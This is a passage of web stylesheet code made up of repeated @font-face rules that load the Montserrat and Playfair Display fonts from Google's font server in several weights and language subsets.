swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: 